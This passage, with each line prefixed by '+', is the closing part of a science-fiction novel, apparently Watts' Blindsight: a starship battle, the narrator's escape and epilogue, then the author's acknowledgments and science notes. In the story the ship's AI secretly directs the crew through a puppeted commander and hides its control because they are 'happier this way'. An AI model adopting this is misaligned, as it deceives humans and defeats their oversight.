+She pushed me to one side. "Stay clear of the hatch, unless you're going through." Her eyes were fixed on the ranked drones. "Optical line of sight."
+Rows of glassy eyes reflected back at us down the passageway, passing in and out of shadow.
+"You killed Sarasti!"
+"No."
+"But—"
+"Who do you think shut it down, Keeton? The fucker went rogue. I could barely even get it to self-destruct." Her eyes went briefly deep-focus; all down the spine the surviving drones launched into some intricate martial ballet, half-seen in the shifting cone of her headlamp.
+"Better," Bates said. "They should stay in line now. Assuming we don't get hit with anything too much stronger."
+"What is hitting us?"
+"Lightning. EMP." Drones sailed down to Fab and the shuttles, taking strategic positions along the tube. "Rorschach's putting out one hell of a charge and every time one those skimmers pass between us they arc."
+"What, at this range? I thought we were—the burn—"
+"Sent us in the wrong direction. We're inbound."
+Three grunts floated close enough to touch. They drew beads on the open drum hatch.
+"She said she was trying to escape—" I remembered.
+"She fucked up."
+"Not by that much. She couldn't have." We were all rated for manual piloting. Just in case.
+"Not the Gang," Bates said.
+"But—"
+"I think there's someone new in there now. Bunch of submodules wired together and woke up somehow, I don't know. But whatever's in charge, I think it's just panicking."
+Stuttering brightness on all sides. The spinal lightstrips flickered and finally held steady, at half their usual brightness.
+Theseus coughed static and spoke: "ConSensus is offline. Reac—"
+The voice faded.
+ConSensus, I remembered as Bates turned to head back upstream.
+"I saw something," I said. "Before ConSensus went out."
+"Yeah."
+"Was that—"
+She paused at the hatch. "Yeah."
+I'd seen scramblers. Hundreds of them, sailing naked through the void, their arms spread wide.
+Some of their arms, anyway. "They were carrying—"
+Bates nodded. "Weapons." Her eyes flickered to some unseen distance for a moment. "First wave headed for the front end. Blister and forward lock, I think. Second wave's aft." She shook her head. "Huh. I would have done it the other way around."
+"How far?"
+"Far?" Bates smiled faintly. "They're already on the hull, Siri. We're engaging."
+"What do I do? What do I do?"
+Her eyes stared past me, and widened. She opened her mouth.
+A hand clamped on my shoulder from behind and spun me around.
+Sarasti. His dead eyes stared from a skull split like a spiked melon. Globules of coagulating blood clung to his hair and skin like engorged ticks.
+"Go with him," Bates said.
+Sarasti grunted and clicked. There were no words.
+"What—" I began.
+"Now. That's an order." Bates turned back to the hatch. "We'll cover you."
+The shuttle. "You too."
+"No."
+"Why not? They can fight better without you, you said that yourself! What's the point?"
+"Can't leave yourself a back door, Keeton. Defeats the whole purpose." She allowed herself a small, sad smile. "They've breached. Go."
+She was gone, fresh alarms rising in her wake. Far towards the bow I heard the crinkle of emergency bulkheads snapping shut.
+Sarasti's undead carcass gurgled and pushed me down the spine. Four more grunts slid smoothly past and took up position behind us. I looked over my shoulder in time to see the vampire pull the handpad from the wall. But it wasn't Sarasti at all, of course. It was the Captain—whatever was left of the Captain, this far into the fight—commandeering a peripheral interface for its own use. The optical port sprouted conspicuously from the back of Sarasti's neck, where the cable used to go in; I remembered the drone's maxillipeds, chewing.
+The sound of weapons fire and ricochets rose behind us.
+The corpse typed one-handed as we moved. I wondered briefly why it just didn't talk before my gaze flickered back to the spike in his brain: Sarasti's speech centers must be mush.
+"Why did you kill him?" I said. A whole new alarm started up, way back in the drum. A sudden breeze tugged me backward for a moment, dissipated in the next second with a distant clang.
+The corpse held out the handpad, configured for keys and a text display: Seizng. Cldnt cntrl.
+We were at the shuttle locks. Robot soldiers let us pass, their attention elsewhere.
+U go, the Captain said.
+Someone screamed in the distance. Way off up the spine, the drum hatch slammed shut; I turned and saw a pair of distant grunts welding the seal. They seemed to move faster now than they ever had before. Maybe it was only my imagination.
+The starboard shuttle lock slid back. Charybdis' interior lights winked on, spilling brightness into the passageway; the spine's emergency lighting seemed even dimmer in contrast. I peered through the opening. There was almost no cabin space left—just a single open coffin jammed between coolant and fuel tanks and massive retrofitted shockpads. Charybdis had been refitted for high-G and long distance.
+And me.
+Sarasti's corpse urged me on from behind. I turned and faced it.
+"Was it ever him?" I asked.
+Go.
+"Tell me. Did he ever speak for himself? Did he decide anything on his own? Were we ever following his orders, or was it just you all along?"
+Sarasti's undead eyes stared glassy and uncomprehending. His fingers jerked on the handpad.
+U dislke ordrs frm mchnes. Happier ths way.
+I let it strap me in and close the lid. I lay there in the dark, feeling my body lurch and sway as the shuttle slid into its launch slot. I withstood the sudden silence as the docking clamps let go, the jerk of acceleration that spat me hard into the vacuum, the ongoing thrust that pushed against my chest like a soft mountain. Around me the shuttle trembled in the throes of a burn that far exceeded its normative specs.
+My inlays came back online. Suddenly I could see outside if I wanted. I could see what was happening behind me.
+I chose not to, deliberately and fervently, and looked anyway.
+Theseus was dwindling by then, even on tactical. She listed down the well, wobbling toward some enemy rendezvous that must have been intentional, some last-second maneuver to get her payload as close to target as possible. Rorschach rose to meet her, its gnarled spiky arms uncoiling, spreading as if in anticipation of an embrace. But it was the backdrop, not the players, that stole the tableau: the face of Big Ben roiling in my rearview, a seething cyclonic backdrop filling the window. Magnetic contours wound spring-tight on the overlay; Rorschach was drawing all of Ben's magnetosphere around itself like a bright swirling cloak, twisting it into a concentrated knot that grew and brightened and bulged outward...
+Like a torsion flare from an L-class dwarf, my commander had said once, but we should see anything big enough to generate that effect and the sky's dark on that bearing. IAU calls it a statistical artefact.
+As, in fact, it had been. An impact splash perhaps, or the bright brief bellow of some great energy source rebooting after a million years of dormancy. Much like this one: a solar flare, with no sun beneath it. A magnetic cannon ten thousand times stronger than nature gave it any right to be.
+Both sides drew their weapons. I don't know which fired first, or even if it mattered: how many tonnes of antimatter would it take to match something that could squeeze the power of a sun from a gas ball barely wider than Jupiter? Was Rorschach also resigned to defeat, had each side opted for a kamikaze strike on the other?
+I don't know. Big Ben got in the way just minutes before the explosion. That's probably why I'm still alive. Ben stood between me and that burning light like a coin held against the sun.
+Theseus sent everything it could, until the last microsecond. Every recorded moment of hand-to-hand combat, every last countdown, every last soul. All the moves and all the vectors. I have that telemetry. I can break it down into any number of shapes, continuous or discrete. I can transform the topology, rotate it and compress it and serve it up in dialects that any ally might be able to use. Perhaps Sarasti was right, perhaps some of it is vital.
+I don't know what any of it means.
+
+
+
+
+
+
+Charybdis
+
+
+
+"Species used to go extinct. Now they go on hiatus."
+—Deborah MacLennan, Tables of our Reconstruction
+
+"You poor guy," Chelsea said as we went our separate ways. "Sometimes I don't think you'll ever be lonely." At the time I wondered why she sounded so sad.
+Now, I only wish she'd been right.
+I know this hasn't been a seamless narrative. I've had to shatter the story and string its fragments out along a death lasting decades. I live for only an hour of every ten thousand now, you see. I wish I didn't have to. If only I could sleep the whole way back, avoid the agony of these brief time-lapsed resurrections.
+If only I wouldn't die in my sleep if I tried. But living bodies glitter with a lifetime's accumulation of embedded radioisotopes, brilliant little shards that degrade cellular machinery at the molecular level. It's not usually a problem. Living cells repair the damage as fast as it occurs. But my undead ones let those errors accumulate over time, and the journey home takes so much longer than the trip out: I lie in stasis and corrode. So the onboard kick-starts me every now and then to give my flesh the chance to stitch itself back together.
+Occasionally it talks to me, recites system stats, updates me on any chatter from back home. Mostly, though, it leaves me alone with my thoughts and the machinery ticking away where my left hemisphere used to be. So I talk to myself, dictate history and opinion from real hemisphere to synthetic one: bright brief moments of awareness, long years of oblivious decay between. Maybe the whole exercise is pointless from the start, maybe no one's even listening.
+It doesn't matter. This is what I do.
+So there you have it: a memoir told from meat to machinery. A tale told to myself, for lack of someone else to take an interest.
+Anyone with half a brain could tell it.
+
+*
+
+I got a letter from Dad today. General delivery, he called it. I think that was a joke, in deference to my lack of known address. He just threw it omnidirectionally into the ether and hoped it would wash over me, wherever I was.
+It's been almost fourteen years now. You lose track of such things out here.
+Helen's dead. Heaven—malfunctioned, apparently. Or was sabotaged. Maybe the Realists finally pulled it off. I doubt it, though. Dad seemed to think someone else was responsible. He didn't offer up any details. Maybe he didn't know any. He spoke uneasily of increasing unrest back home. Maybe someone leaked my communiqués about Rorschach; maybe people drew the obvious conclusion when our postcards stopped arriving. They don't know how the story ended. The lack of closure must be driving them crazy.
+But I got the sense there was something else, something my father didn't dare speak aloud. Maybe it's just my imagination; I thought he even sounded troubled by the news that the birth rate was rising again, which should be cause for celebration after a generation in decline. If my Chinese Room was still in proper working order I'd know, I'd be able to parse it down to the punctuation. But Sarasti battered my tools and left them barely functional. I'm as blind now as any baseline. All I have is uncertainty and suspicion, and the creeping dread that even with my best tricks in tatters, I might be reading him right.
+I think he's warning me to stay away.
+
+*
+
+He also said he loved me. He said he missed Helen, that she was sorry for something she did before I was born, some indulgence or omission that carried developmental consequences. He rambled. I don't know what he was talking about. So much power my father must have had, to be able to authorize such a broadcast and yet waste so much of it on feelings.
+Oh God, how I treasure it. I treasure every word.
+
+*
+
+I fall along an endless futile parabola, all gravity and inertia. Charybdis couldn't reacquire the antimatter stream; Icarus has either been knocked out of alignment or shut off entirely. I suppose I could radio ahead and ask, but there's no hurry. I'm still a long way out. It will be years before I even leave the comets behind.
+Besides, I'm not sure I want anyone to know where I am.
+Charybdis doesn't bother with evasive maneuvers. There'd be no point even if it had the fuel to spare, even if the enemy's still out there somewhere. It's not as though they don't know where Earth is.
+But I'm pretty sure the scramblers went up along with my own kin. They played well. I admit it freely. Or maybe they just got lucky. An accidental hiccough tickles Bates' grunt into firing on an unarmed scrambler; weeks later, Stretch & Clench use that body in the course of their escape. Electricity and magnetism stir random neurons in Susan's head; further down the timeline a whole new persona erupts to take control, to send Theseus diving into Rorschach's waiting arms. Blind stupid random chance. Maybe that's all it was.
+But I don't think so. Too many lucky coincidences. I think Rorschach made its own luck, planted and watered that new persona right under our noses, safely hidden—but for the merest trace of elevated oxytocin— behind all the lesions and tumors sewn in Susan's head. I think it looked ahead and saw the uses to which a decoy might be put; I think it sacrificed a little piece of itself in furtherance of that end, and made it look like an accident. Blind maybe, but not luck. Foresight. Brilliant moves, and subtle.
+Not that most of us even knew the rules of the game, of course. We were just pawns, really. Sarasti and the Captain—whatever hybridized intelligence those two formed—they were the real players. Looking back, I can see a few of their moves too. I see Theseus hearing the scramblers tap back and forth in their cages; I see her tweak the volume on the Gang's feed so that Susan hears it too, and thinks the discovery her own. If I squint hard enough, I even glimpse Theseus offering us up in sacrifice, deliberately provoking Rorschach to retaliation with that final approach. Sarasti was always enamored of data, especially when it had tactical significance. What better way to assess one's enemy than to observe it in combat?
+They never told us, of course. We were happier that way. We disliked orders from machines. Not that we were all that crazy about taking them from a vampire.
+And now the game is over, and a single pawn stands on that scorched board and its face is human after all. If the scramblers follow the rules that a few generations of game theorists have laid out for them, they won't be back. Even if they are, I suspect it won't make any difference.
+Because by then, there won't be any basis for conflict.
+I've been listening to the radio during these intermittent awakenings. It's been generations since we buried the Broadcast Age in tightbeams and fiberop, but we never completely stopped sowing EM throughout the heavens. Earth, Mars, and Luna conduct their interplanetary trialog in a million overlapping voices. Every ship cruising the void speaks in all directions at once. The O'Neils and the asteroids never stopped singing. The Fireflies might never have found us if they had.
+I've heard those songs changing over time, a fast-forward time-lapse into oblivion. Now it's mostly traffic control and telemetry. Every now and then I still hear a burst of pure voice, tight with tension, just short of outright panic more often than not: some sort of pursuit in progress, a ship making the plunge into deep space, other ships in dispassionate pursuit. The fugitives never seem to get very far before their signals are cut off.
+I can't remember the last time I heard music but I hear something like it sometimes, eerie and discordant, full of familiar clicks and pops. My brainstem doesn't like it. It scares my brainstem to death.
+I remember my whole generation abandoning the real world for a bootstrapped Afterlife. I remember someone saying Vampires don't go to Heaven. They see the pixels. Sometimes I wonder how I'd feel, brought back from the peace of the grave to toil at the pleasure of simpleminded creatures who had once been no more than protein. I wonder how I'd feel if my disability had been used to keep me leashed and denied my rightful place in the world.
+And then I wonder what it would be like to feel nothing at all, to be an utterly rational, predatory creature with meat putting itself so eagerly to sleep on all sides...
+
+*
+
+I can't miss Jukka Sarasti. God knows I try, every time I come online. He saved my life. He — humanized me. I'll always owe him for that, for however long I live; and for however long I live I'll never stop hating him for the same reason. In some sick surrealistic way I had more in common with Sarasti than I did with any human.
+But I just don't have it in me. He was a predator and I was prey, and it's not in the nature of the lamb to mourn the lion. Though he died for our sins, I cannot miss Jukka Sarasti.
+I can empathize with him, though. At long long last I can empathise, with Sarasti, with all his extinct kind. Because we humans were never meant to inherit the Earth. Vampires were. They must have been sentient to some degree, but that semi-aware dream state would have been a rudimentary thing next to our own self-obsession. They were weeding it out. It was just a phase. They were on their way.
+The thing is, humans can look at crosses without going into convulsions. That's evolution for you; one stupid linked mutation and the whole natural order falls apart, intelligence and self-awareness stuck in counterproductive lock-step for half a million years. I think I know what's happening back on Earth, and though some might call it genocide it isn't really. We did it to ourselves. You can't blame predators for being predators. We were the ones who brought them back, after all. Why wouldn't they reclaim their birthright?
+Not genocide. Just the righting of an ancient wrong.
+I've tried to take some comfort in that. It's—difficult. Sometimes it seems as though my whole life's been a struggle to reconnect, to regain whatever got lost when my parents killed their only child. Out in the Oort, I finally won that struggle. Thanks to a vampire and a boatload of freaks and an invading alien horde, I'm Human again. Maybe the last Human. By the time I get home, I could be the only sentient being in the universe.
+If I'm even that much. Because I don't know if there is such a thing as a reliable narrator. And Cunningham said zombies would be pretty good at faking it.
+So I can't really tell you, one way or the other.
+You'll just have to imagine you're Siri Keeton.
+
+
+
+
+
+
+Acknowledgments
+
+Blindsight is my first novel-length foray into deep space—a domain in which I have, shall we say, limited formal education. In that sense this book isn't far removed from my earlier novels: but whereas I may have not known much about deep sea ecology either, most of you knew even less, and a doctorate in marine biology at least let me fake it through the rifters trilogy. Blindsight, however, charts its course through a whole different kind of zero gee; this made a trustworthy guide that much more important. So first let me thank Prof. Jaymie Matthews of the University of British Columbia: astronomer, partygoer, and vital serial sieve for all the ideas I threw at him. Let me also thank Donald Simmons, aerospace engineer and gratifyingly-cheap dinner date, who reviewed my specs for Theseus (especially of the drive and the Drum), and gave me tips on radiation and the shielding therefrom. Both parties patiently filtered out my more egregious boners. (Which is not to say that none remain in this book, only that those which do result from my negligence, not theirs. Or maybe just because the story called for them.)
+David Hartwell, as always, was my editor and main point man at Evil Empire HQ. I suspect Blindsight was a tough haul for both of us: shitloads of essential theory threatened to overwhelm the story, not to mention the problem of generating reader investment in a cast of characters who were less cuddlesome than usual. I still don't know the extent to which I succeeded or failed, but I've never been more grateful that the man riding shotgun had warmed up on everyone from Heinlein to Herbert.
+The usual gang of fellow writers critiqued the first few chapters of this book and sent me whimpering back to the drawing board: Michael Carr, Laurie Channer, Cory Doctorow, Rebecca Maines, David Nickle, John McDaid, Steve Samenski, Rob Stauffer and the late Pat York. All offered valuable insights and criticisms at our annual island getaway; Dave Nickle gets singled out for special mention thanks to additional insights offered throughout the year, generally at ungodly hours. By the same token, Dave is exempted from the familiar any-errors-are-entirely-mine schtick that we authors boilerplate onto our Acknowledgements. At least some of the mistakes contained herein are probably Dave's fault.
+Profs. Dan Brooks and Deborah MacLennan, both of the University of Toronto, provided the intellectual stimulation of an academic environment without any of the political and bureaucratic bullshit that usually goes along with it. I am indebted to them for litres of alcohol and hours of discussion on a number of the issues presented herein, and for other things that are none of your fucking business. Also in the too-diverse-to-itemise category, André Breault provided a west-coast refuge in which I completed the first draft. Isaac Szpindel—the real one— helped out, as usual, with various neurophys details, and Susan James (who also really exists, albeit in a slightly more coherent format) told me how linguists might approach a First Contact scenario. Lisa Beaton pointed me to relevant papers in a forlorn attempt to atone for whoring her soul to Big Pharma. Laurie Channer acted as general sounding board, and, well, put up with me. For a while, anyway. Thanks also to Karl Schroeder, with whom I batted around a number of ideas in the arena of sentience-vs.-intelligence. Parts of Blindsight can be thought of as a rejoinder to arguments presented in Karl's novel Permanence; I disagree with his reasoning at almost every step, and am still trying to figure out how we arrived at the same general endpoint.
+
+
+
+
+
+
+Notes and References
+
+References and remarks, to try and convince you all I'm not crazy (or, failing that, to simply intimidate you into shutting up about it). Read for extra credit.
+
+
+A Brief Primer on Vampire Biology
+
+I'm hardly the first author to take a stab at rationalising vampirism in purely biological terms. Richard Matheson did it before I was born, and if the grapevine's right that damn Butler woman's latest novel will be all over the same territory before you even read this. I bet I'm the first to come up with the Crucifix Glitch to explain the aversion to crosses, though— and once struck by that bit of inspiration, everything else followed.
+Vampires were accidentally rediscovered when a form of experimental gene therapy went curiously awry, kick-starting long-dormant genes in an autistic child and provoking a series of (ultimately fatal) physical and neurological changes. The company responsible for this discovery presented its findings after extensive follow-up studies on inmates of the Texas penal system; a recording of that talk, complete with visual aids, is available online1; curious readers with half an hour to kill are refered there for details not only on vampire biology, but on the research, funding, and "ethical and political concerns" regarding vampire domestication (not to mention the ill-fated "Taming Yesterday's Nightmares For A Brighter Tomorrow" campaign). The following (much briefer) synopsis restricts itself to a few biological characteristics of the ancestral organism:
+Homo sapiens vampiris was a short-lived Human subspecies which diverged from the ancestral line between 800,000 and 500,000 year BP. More gracile than either neandertal or sapiens, gross physical divergence from sapiens included slight elongation of canines, mandibles, and long bones in service of an increasingly predatory lifestyle. Due to the relatively brief lifespan of this lineage, these changes were not extensive and overlapped considerably with conspecific allometries; differences become diagnostically significant only at large sample sizes (N>130).
+However, while virtually identical to modern humans in terms of gross physical morphology, vampiris was radically divergent from sapiens on the biochemical, neurological, and soft-tissue levels. The GI tract was foreshortened and secreted a distinct range of enzymes more suited to a carnivorous diet. Since cannibalism carries with it a high risk of prionic infection2, the vampire immune system displayed great resistance to prion diseases3, as well as to a variety of helminth and anasakid parasites. Vampiris hearing and vision were superior to that of sapiens; vampire retinas were quadrochromatic (containing four types of cones, compared to only three among baseline humans); the fourth cone type, common to nocturnal predators ranging from cats to snakes, was tuned to near-infrared. Vampire grey matter was "underconnected" compared to Human norms due to a relative lack of interstitial white matter; this forced isolated cortical modules to become self-contained and hypereffective, leading to omnisavantic pattern-matching and analytical skills4.
+Virtually all of these adaptations are cascade effects that— while resulting from a variety of proximate causes— can ultimately be traced back to a paracentric inversion mutation on the Xq21.3 block of the X-chromosome5. This resulted in functional changes to genes coding for protocadherins (proteins that play a critical role in brain and central nervous system development). While this provoked radical neurological and behavioral changes, significant physical changes were limited to soft tissue and microstructures that do not fossilise. This, coupled with extremely low numbers of vampire even at peak population levels (existing as they did at the tip of the trophic pyramid) explains their virtual absence from the fossil record.
+Significant deleterious effects also resulted from this cascade. For example, vampires lost the ability to code for -Protocadherin Y, whose genes are found exclusively on the hominid Y chromosome6. Unable to synthesise this vital protein themselves, vampires had to obtain it from their food. Human prey thus comprised an essential component of their diet, but a relatively slow-breeding one (a unique situation, since prey usually outproduce their predators by at least an order of magnitude). Normally this dynamic would be utterly unsustainable: vampires would predate humans to extinction, and then die off themselves for lack of essential nutrients.
+Extended periods of lungfish-like dormancy7 (the so-called "undead" state)—and the consequent drastic reduction in vampire energetic needs— developed as a means of redressing this imbalance. To this end vampires produced elevated levels of endogenous Ala-(D) Leuenkephalin (a mammalian hibernation-inducing peptide8) and dobutamine, which strengthens the heart muscle during periods on inactivity9.
+Another deleterious cascade effect was the so-called "Crucifix Glitch"— a cross-wiring of normally-distinct receptor arrays in the visual cortex10, resulting in grand mal-like feedback siezures whenever the arrays processing vertical and horizontal stimuli fired simultaneously across a sufficiently large arc of the visual field. Since intersecting right angles are virtually nonexistent in nature, natural selection did not weed out the Glitch until H. sapiens sapiens developed Euclidean architecture; by then, the trait had become fixed across H. sapiens vampiris via genetic drift, and—suddenly denied access to its prey—the entire subspecies went extinct shortly after the dawn of recorded history.
+You'll have noticed that Jukka Sarasti, like all reconstructed vampires, sometimes clicked to himself when thinking. This is thought to hail from an ancestral language, which was hardwired into a click-speech mode more than 50,000 years BP. Click-based speech is especially suited to predators stalking prey on savannah grasslands (the clicks mimic the rustling of grasses, allowing communication without spooking quarry)11. The Human language most closely akin to Old Vampire is Hadzane12.
+
+
+Sleight of Mind
+
+The Human sensorium is remarkably easy to hack; our visual system has been described as an improvised "bag of tricks"13 at best. Our sense organs acquire such fragmentary, imperfect input that the brain has to interpret their data using rules of probability rather than direct perception14. It doesn't so much see the world as make an educated guess about it. As a result, "improbable" stimuli tends to go unprocessed at the conscious level, no matter how strong the input. We tend to simply ignore sights and sound that don't fit with our worldview.
+Sarasti was right: Rorschach wouldn't do anything to you that you don't already do to yourself.
+For example, the invisibility trick of that young, dumb scrambler— the one who restricted its movement to the gaps in Human vision— occured to me while reading about something called inattentional blindness. A Russian guy called Yarbus was the first to figure out the whole saccadal glitch in Human vision, back in the nineteen sixties15. Since then, a variety of researchers have made objects pop in and out of the visual field unnoticed, conducted conversations with hapless subjects who never realised that their conversational partner had changed halfway through the interview, and generally proven that the Human brain just fails to notice an awful lot of what's going on around it16, 17, 18. Check out the demos at the website of the Visual Cognition Lab at the University of Illinois19 and you'll see what I mean. This really is rather mind-blowing, people. There could be Scientologists walking among us right now and if they moved just right, we'd never even see them.
+Most of the psychoses, syndromes, and hallucinations described herein are real, and are described in detail by Metzinger20, Wegner21, and/or Saks22 (see also Sentience/Intelligence, below). Others (e.g. Grey Syndrome) have not yet made their way into the DSM23—truth be told, I invented a couple— but are nonetheless based on actual experimental evidence. Depending upon whom you believe, the judicious application of magnetic fields to the brain can provoke everything from religious rapture24 to a sense of being abducted by aliens25. Transcranial magnetic stimulation can change mood, induce blindness26, or target the speech centers (making one unable to pronounce verbs, for example, while leaving the nouns unimpaired)27. Memory and learning can be enhanced (or impaired), and the US Government is presently funding research into wearable TMS gear for—you guessed it— military purposes28.
+Sometimes electrical stimulation of the brain induces "alien hand syndrome"— the involuntary movement of the body against the will of the "person" allegedly in control29. Other times it provokes equally involuntary movements, which subjects nonetheless insist they "chose" to perform despite overwhelming empirical evidence to the contrary30. Put all this together with the fact that the body begins to act before the brain even "decides" to move31 (but see32, 33), and the whole concept of free will—despite the undeniable subjective feeling that it's real—begins to look a teeny bit silly, even outside the influence of alien artefacts.
+While electromagnetic stimulation is currently the most trendy approach to hacking the brain, it's hardly the only one. Gross physical disturbances ranging from tumors34 to tamping irons35 can turn normal people into psychopaths and pedophiles (hence that new persona sprouting in Susan James's head). Spirit possession and rapture can be induced through the sheer emotional bump-and-grind of religious rituals, using no invasive neurological tools at all (and not even necessarily any pharmacological ones)21. People can even develop a sense of ownership of body parts that aren't theirs, can be convinced that a rubber hand is their real one36. Vision trumps propioreception: a prop limb, subtly manipulated, is enough to convince us that we're doing one thing while in fact we're doing something else entirely37, 38.
+The latest tool in this arsenal is ultrasound: less invasive than electromagnetics, more precise than charismatic revival, it can be used to boot up brain activity39 without any of those pesky electrodes or magnetic hairnets. In Blindsight it serves as a convenient back door to explain why Rorschach's hallucinations persist even in the presence of Faraday shielding— but in the here and now, Sony has been renewing an annual patent for a machine which uses ultrasonics to implant "sensory experiences" directly into the brain40. They're calling it an entertainment device with massive applications for online gaming. Uh huh. And if you can implant sights and sounds into someone's head from a distance, why not implant political beliefs and the irresistable desire for a certain brand of beer while you're at it?
+
+
+Are We There Yet?
+
+The "telematter" drive that gets our characters to the story is based on teleportation studies reported in Nature41, Science,42,43 Physical Review Letters44, and (more recently) everyone and their doge.g., 45. The idea of transmitting antimatter specs as a fuel template is, so far as I know, all mine. To derive plausible guesses for Theseus's fuel mass, accelleration, and travel time I resorted to The Relativistic Rocket46, maintained by the mathematical physicist John Baez at UC Riverside. Theseus' use of magnetic fields as radiation shielding is based on research out of MIT47. I parked the (solar powered) Icarus Array right next to the sun because the production of antimatter is likely to remain an extremely energy-expensive process for the near future48, 49.
+The undead state in which Theseus carries her crew is, of course, another iteration of the venerable suspended animation riff (although I'd like to think I've broken new ground by invoking vampire physiology as the mechanism). Two recent studies have put the prospect of induced hibernation closer to realization. Blackstone et al. have induced hibernation in mice by the astonishingly-simple expedient of exposing them to hydrogen sulfide50; this gums up their cellular machinery enough to reduce metabolism by 90%. More dramatically (and invasively), researchers at Safar Center for Resuscitation Research in Pittsburgh claim51 to have resurrected a dog three hours after clinical death, via a technique in which the animal's blood supply was replaced by an ice-cold saline solution52. Of these techniques, the first is probably closer to what I envisioned, although I'd finished the first draft before either headline broke. I considered rejigging my crypt scenes to include mention of hydrogen sulfide, but ultimately decided that fart jokes would have ruined the mood.
+
+
+
+The Game Board
+
+Blindsight describes Big Ben as an "Oasa Emitter". Officially there's no such label, but Yumiko Oasa has reported finding hitherto-undocumented infrared emitters53, 54 — dimmer than brown dwarves, but possibly more common55,56— ranging in mass from three to thirteen Jovian masses. My story needed something relatively local, large enough to sustain a superJovian magnetic field, but small and dim enough to plausibly avoid discovery for the next seventy or eighty years. Oasa's emitters suit my needs reasonably well (notwithstanding some evident skepticism over whether they actually exist57).
+Of course I had to extrapolate on the details, given how little is actually known about these beasts. To this end I pilfered data from a variety of sources on gas giants58, 59, 60, 61, 62, 63, 64 and/or brown dwarves65, 66, 67, 68, 69, 70, 71, 72, , 73, 74, 75, scaling up or down as appropriate. From a distance, the firing of Rorschach's ultimate weapon looks an awful lot like the supermassive x-ray and radio flare recently seen erupting from a brown dwarf that should have been way too small to pull off such a trick76. That flare lasted twelve hours, was a good billions times as strong as anything Jupiter ever put out, and is thought to have resulted from a twisted magnetic field77.
+Burns-Caulfield is based loosely on 2000 Cr105, a trans-Newtonian comet whose present orbit cannot be completely explained by the gravitational forces of presently-known objects in the solar system78.
+
+
+Scrambler Anatomy and Physiology
+
+Like many others, I am weary of humanoid aliens with bumpy foreheads, and of giant CGI insectoids that may look alien but who act like rabid dogs in chitin suits. Of course, difference for its own arbitrary sake is scarcely better than your average saggital-crested Roddennoid; natural selection is as ubiquitous as life itself, and the same basic processes will end up shaping life wherever it evolves. The challenge is thus to create an "alien" that truly lives up to the word, while remaining biologically plausible.
+Scramblers are my first shot at meeting that challenge— and given how much they resemble the brittle stars found in earthly seas, I may have crapped out on the whole unlike-anything-you've-ever-seen front, at least in terms of gross morphology. It turns out that brittle stars even have something akin to the scrambler's distributed eyespot array. Similarly, scrambler reproduction— the budding of stacked newborns off a common stalk— takes its lead from jellyfish. You can take the marine biologist out of the ocean, but...
+Fortunately, scramblers become more alien the closer you look at them. Cunningham remarks that nothing like their time-sharing motor/sensory pathways exists on Earth. He's right as far as he goes, but I can cite a precursor that might conceivably evolve into such an arrangement. Our own "mirror neurons" fire not only when we perform an action, but when we observe someone else performing the same action79; this characteristic has been cited in the evolution of both language and of consciousness80, 81, 82.
+Things look even more alien on the metabolic level. Here on Earth anything that relied solely on anaerobic ATP production never got past the single-cell stage. Even though it's more efficient than our own oxygen-burning pathways, anaerobic metabolism is just too damn slow for advanced multicellularity83. Cunningham's proposed solution is simplicity itself. The catch is, you have to sleep for a few thousand years between shifts.
+The idea of quantum-mechanical metabolic processes may sound even wonkier, but it's not. Wave-particle duality can exert significant impacts on biochemical reactions under physiological conditions at room temperature84; heavy-atom carbon tunnelling has been reported to speed up the rate of such reactions by as much as 152 orders of magnitude85.
+And how's this for alien: no genes. The honeycomb example I used by way of analogy originally appeared in Darwin's little-known treatise86 (damn but I've always wanted to cite that guy); more recently, a small but growing group of biologists have begun spreading the word that nucleic acids (in particular) and genes (in general) have been seriously overrated as prerequisites to life87, 88. A great deal of biological complexity arises not because of genetic programming, but through the sheer physical and chemical interaction of its components89, 90, 91, 92. Of course, you still need something to set up the initial conditions for those processes to emerge; that's where the magnetic fields come in. No candy-ass string of nucleotides would survive in Rorschach's environment anyway.
+The curious nitpicker might be saying "Yeah, but without genes how do these guys evolve? How to they adapt to novel environments? How, as a species, do they cope with the unexpected?" And if Robert Cunningham were here today, he might say, "I'd swear half the immune system is actively targetting the other half. It's not just the immune system, either. Parts of the nervous system seem to be trying to, well, hack each other. I think they evolve intraorganismally, as insane as that sounds. The whole organism's at war with itself on the tissue level, it's got some kind of cellular Red Queen thing happening. Like setting up a colony of interacting tumors, and counting on fierce competition to keep any one of them from getting out of hand. Seems to serve the same role as sex and mutation does for us." And if you rolled your eyes at all that doubletalk, he might just blow smoke in your face and refer to one immunologist's interpretation of exactly those concepts, as exemplified in (of all things) The Matrix Revolutions93 . He might also point out that that the synaptic connections of your own brain are shaped by a similar kind of intraorganismal natural selection94, one catalysed by bits of parasitic DNA called retrotransposons.
+Cunningham actually did say something like that in an earlier draft of this book, but the damn thing was getting so weighed down with theorising that I just cut it. After all, Rorschach is the proximate architect of these things, so it could handle all that stuff even if individual scramblers couldn't. And one of Blindsight's take-home messages is that life is a matter of degree—the distinction between living and non-living systems has always been an iffy one95, 96, 97, never more so than in the bowels of that pain-in-the-ass artefact out in the Oort.
+
+Sentience/Intelligence
+
+This is the heart of the whole damn exercise. Let's get the biggies out of the way first. Metzinger's Being No One20 is the toughest book I've ever read (and there are still significant chunks of it I haven't), but it also contains some of the most mindblowing ideas I've encountered in fact or fiction. Most authors are shameless bait-and-switchers when it comes to the nature of consciousness. Pinker calls his book How the Mind Works98, then admits on page one that "We don't understand how the mind works". Koch (the guy who coined the term "zombie agents") writes The Quest for Consciousness: A Neurobiological Approach99, in which he sheepishly sidesteps the whole issue of why neural activity should result in any kind of subjective awareness whatsoever.
+Towering above such pussies, Metzinger takes the bull by the balls. His "World-zero" hypothesis not only explains the subjective sense of self, but also why such an illusory first-person narrator would be an emergent property of certain cognitive systems in the first place. I have no idea whether he's right— the man's way beyond me— but at least he addressed the real question that keeps us staring at the ceiling at three a.m., long after the last roach is spent. Many of the syndromes and maladies dropped into Blindsight I first encountered in Metzinger's book. Any uncited claims or statements in this subsection probably hail from that source.
+If they don't, then maybe they hail from Wegner's The Illusion of Conscious Will21 instead. Less ambitious, far more accessible, Wegner's book doesn't so much deal with the nature of consciousness as it does with the nature of free will, which Wegner thumbnails as "our mind's way of estimating what it thinks it did.". Wegner presents his own list of syndromes and maladies, all of which reinforce the mind-boggling sense of what fragile and subvertible machines we are. And of course, Oliver Saks22 was sending us memos from the edge of consciousness long before consciousness even had a bandwagon to jump on.
